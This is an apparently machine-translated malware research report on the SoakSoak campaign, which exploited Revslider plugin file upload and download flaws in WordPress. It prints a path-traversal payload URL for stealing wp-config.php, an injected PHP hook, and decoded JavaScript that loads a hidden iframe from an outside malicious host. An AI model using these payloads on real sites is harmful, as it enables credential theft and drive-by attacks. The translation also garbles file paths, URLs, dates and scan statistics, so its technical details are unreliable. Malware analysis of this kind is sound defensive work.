SoakSoak malware tracing Research Report

SoakSoak malware tracing Research Report

 

On June 23, December 14, 2014, a foreign Sucuri security blog reported that a large number of WordPress sites were affected by SoakSoak malware. It is reported that the malware will infect the WordPress source code file and implant malicious code in it. Attackers use SoakSoak to mount Trojans and implant backdoors on infected sites.

A) vulnerability description

According to reports, the outbreak of SoakSoak malware in a large number of WordPress sites stems from a slide plug-in named Revslider, which has been exposed to multiple security vulnerabilities, allows you to download or upload any file. Produced by ThemePunch, Revslider is a commercial plug-in (charged). It has a good sales volume due to its powerful functions and good usability, this plug-in is also included in some WordPress Themes produced by ThemePunch.

Attackers may exploit this plug-in's Arbitrary File Download Vulnerability to obtain a large number of WordPress wp-config.php configuration files, attackers can exploit the Arbitrary File Upload Vulnerability to upload webshell to modify the WordPress source code file and insert malicious code. Combined with what was mentioned in the article, attackers should be by modifying the source code of "/wp-content/template-loader.php" in WordPress, this allows you to remotely load a JavaScript script on soaksoak.ru while accessing the page of the infected WordPress site. Attackers use this JavaScript script to attack a specific browser.

B) Vulnerability Analysis

The Revslider plug-in provides a brief analysis of the Arbitrary File Upload Vulnerability and Arbitrary File Download Vulnerability.

1) Arbitrary File Upload Vulnerability:

Because the Revslider plug-in is a paid plug-in, the following is the analysis and test result of version 3.0.3.

The arbitrary file upload vulnerability is caused by the plug-in's built-in "plug-in Update" function. When this plug-in is enabled, a series of action operations are registered to the WordPress ajax request. The plug-in does not judge the user permission after accepting the update request, which can be exploited by malicious users.

Files involved:/revslider_admin.php

When enabled, the plug-in binds the ajax_action parameter to the onAjaxAction () function and calls onAjaxAction () when passing parameters to the plug-in through/wp-admin/admin-ajax.php ().

The key part of the onAjaxAction () function is as follows:

When the post parameter $ client_action is "update_plugin", updatePlugin () is called to upgrade the plug-in.

The updatePlugin () function is located in/inc_php/framework/base_admin.class.php.

Files involved:/inc_php/framework/base_admin.class.php

Briefly analyzes the process of File Upload Vulnerability formation. First, this function (updatePlugin () obtains the information of the post object:

$ ArrFiles = UniteFunctionsRev: getVal ($ _ FILES, "update_file ");

The file name and MIME Type of the uploaded file will be obtained later (the plug-in has commented out the detection code of the MIME type ).

Then, get the temporary path of the uploaded file and create the directory "/temp/update_extract" (if the directory fails to be created, an exception will be thrown and the processing will be aborted ):

 

If "/temp/update_extract" is created successfully, all files in the directory are cleared and uploaded files are moved to the directory:

Obviously, there is no restriction on the file to be uploaded. directly use move_uploaded_file () to copy the uploaded file (any) to the "/temp/update_extract/" directory, no further analysis is required for subsequent processing.

Construct the following local form:

The content of temp.txt is:

Test file upload

Then click upload:

Here we can see that the echo prompts "Update error", but according to the analysis just now, the uploaded file has actually been copied to the "/temp/update_extract/" Directory through move_uploaded_file.

2) Arbitrary File Download Vulnerability:

After the plug-in is enabled, it provides a show_image function, which can be used through ajax calls of WordPress. However, during the implementation of this function, Incomplete consideration leads to arbitrary file downloads, attackers can exploit this vulnerability to download to the WordPress configuration file wp-config.php and obtain sensitive data such as database connection information.

Files involved:/inc_php/framework/base_admin.class.php

 

When the plug-in is enabled, the show_image request in ajax is bound to the onShowImage () processing function (). The onShowImage () function prototype is located in "/inc_php/framework/base. class. php.

Files involved:/inc_php/framework/base. class. php

The onShowImage () function instantiates the UniteImageViewRev class and calls the showImageFromGet () method of the class.

Files involved:/inc_php/framework/image_view.class.php

The showImageFromGet () function obtains the value of the parameter "img" from the "GET" request and assigns it to the variable.

$ ImageFilename = UniteFunctionsRev: getGetVar ("img ");

Then pay attention to the variable $ effect:

$ Effect = UniteFunctionsRev: getGetVar ("e ");

At the end of the function, call the showImage () method. The key code of the showImage () function is as follows:

The value of $ this-> pathImage is assigned as the physical path of WordPress "wp-content" at the beginning (for example, C: \ xxxx \ www \ wordpress \ wp-content \), and assign a value to $ filepath by connecting $ this-> pathImage with the passed file name $ filename:

$ Filepath = $ this-> pathImages. $ filename;

And $ this-> effect, $ maxWidth and $ maxHeight can both be obtained from the "GET" Request Parameters, so a certain payload can be constructed, execute the function flow to $ this-> outputImage ($ filepath) to read the file. The outputImage () function is as follows:

 

The outputImage () function outputs the file content directly through two operations:

$ Contents = file_get_contents ($ filepath );

Echo $ contents;

And there is no filtering in this process. Therefore, as a test, the following payload can be constructed:

Http://www.test.com/wordpress/wp-admin/admin-ajax.php? Action = revslider_show_image & img =.../wp-config.php

 

C) vulnerability tracking

The PoC was written for the Arbitrary File Upload Vulnerability of the Revslider plug-in, and some WordPress sites containing the Revslider plug-in fingerprint were extracted from ZoomEye for testing. Unfortunately, the test results show that all test sites cannot successfully verify the vulnerability.

However, during the scanning and testing process, we accidentally discovered the backdoor (the backdoor address: http: // wpsite/wp-content/plugins/revslider/temp/update_extract/temp. php ).

 

 

After a backdoor is implanted, the attacker modifies the directory write permission involved in the File Upload Vulnerability and blocks the vulnerability. The technology and experience of attackers can be seen here.

 

Temp. php backdoor analysis:

Although attackers modified the directory permission to block the Arbitrary File Upload Vulnerability of the Revslider plug-in, the Arbitrary File Download Vulnerability of the plug-in successfully obtained the webshell (backdoor) uploaded by the attacker) and analyzed.

After decoding the obfuscated webshell, a backdoor code similar to c99.php (a popular webshell in foreign countries) is obtained.

Although the attacker successfully obtained the source code for the webshell, the hash of the webshell password was not cracked. (We will continue to follow up and investigate the backdoor)

 

SoakSoak:

Attackers inject malicious code and load JavaScript code to attack browsers that browse the infected WordPress site on the 0day of Firefox and IE11, and speculate that attackers are trying to obtain more bots for the next step.

First attackers will modify the site wp-prodes/template-loader.php file, insert malicious code:

<?phpfunction FuncQueueObject(){wp_enqueue_script("swfobject");}add_action("wp_enqueue_scripts",'FuncQueueObject');

In this way, the swfobject. js JavaScript file located in the site "wp-infected des/js/" Directory will be loaded when you browse any page of the infected site.

The following is a sample wp-nodes des/js/swfobject. js file injected with malicious code on the infected website obtained from the Internet:

Among them, the JavaScript code after 6th behavior encoding is decoded to get:

 

From the code above, it can be seen that after attackers infect a website with SoakSoak, a malicious JavaScript code will be loaded and executed when any page of the site is browsed, then the malicious code loads a flash file under the same site (the file does not exist). The path of the malicious flash file is "wp-contents/js/swfobject.swf ", the following is a sample of the swfobject.swf file. The code is decompiled as follows (partial ):

When a visitor browses an infected website using Firefox or IE, once the malicious flash file is loaded, another malicious code is executed.

The Code executed by the ExternalInterface. call () function is decoded by UrlDecode as follows:

function() { var xxx = \"document.body.appendChild(document.createElement('iframe')).outerHTML = '<iframe src="http://milaprostaya.ru/images/" frameborder="0" height="0" width="0" ></iframe>';\"; eval( decodeURIComponent(xxx) );}

The above malicious code will try to load the content on "http://milaprostaya.ru/images/", and suspect that attackers will attack the browser of the viewer in subsequent operations to turn it into their own zombie, more seriously, a botnet may be formed to carry out the next attack. However, in the process of tracing and analysis, we directly access "http://milaprostaya.ru/images/" without obtaining useful information:

 

A personal WordPress blog is installed on the http://milaprostaya.ru, And the WordPress blog system does not have its own "/images" path. (This SoakSoak malware will be continuously tracked)

(The CDN cloud defense platform can effectively intercept attacks by exploiting the Revslider plug-in vulnerability and successfully defend against this malicious JavaScript code attack)

3. ZoomEye detection report

This vulnerability is detected in several ways and the following data is obtained.

A) The first group of data

From ZoomEye, 0.1 million WordPress sites with Revslider plug-in fingerprints are randomly selected from 5646 WordPress sites for backdoor scanning. The results are as follows:

The Revslider plug‑in rate is 5.64%.

A total of 5646 WordPress sites containing the Revslider plug-in fingerprints were scanned, of which 537 were detected with suspected backdoors, and the verification success rate was 9.51%.

We can see that among the more than 5000 testing sites, 537 websites with the same BackDoor are detected. This number cannot be underestimated, this is only the result of backdoor detection. It does not include websites attacked by attackers and implanted with other backdoors. In this case, the impact of SoakSoak on WordPress 0.1 million is not exaggerated at all.

If we estimate the number of WordPress sites with approximately 2.7 million ZoomEye, there will be about 14500 WordPress sites implanted with the backdoor, which is already very large.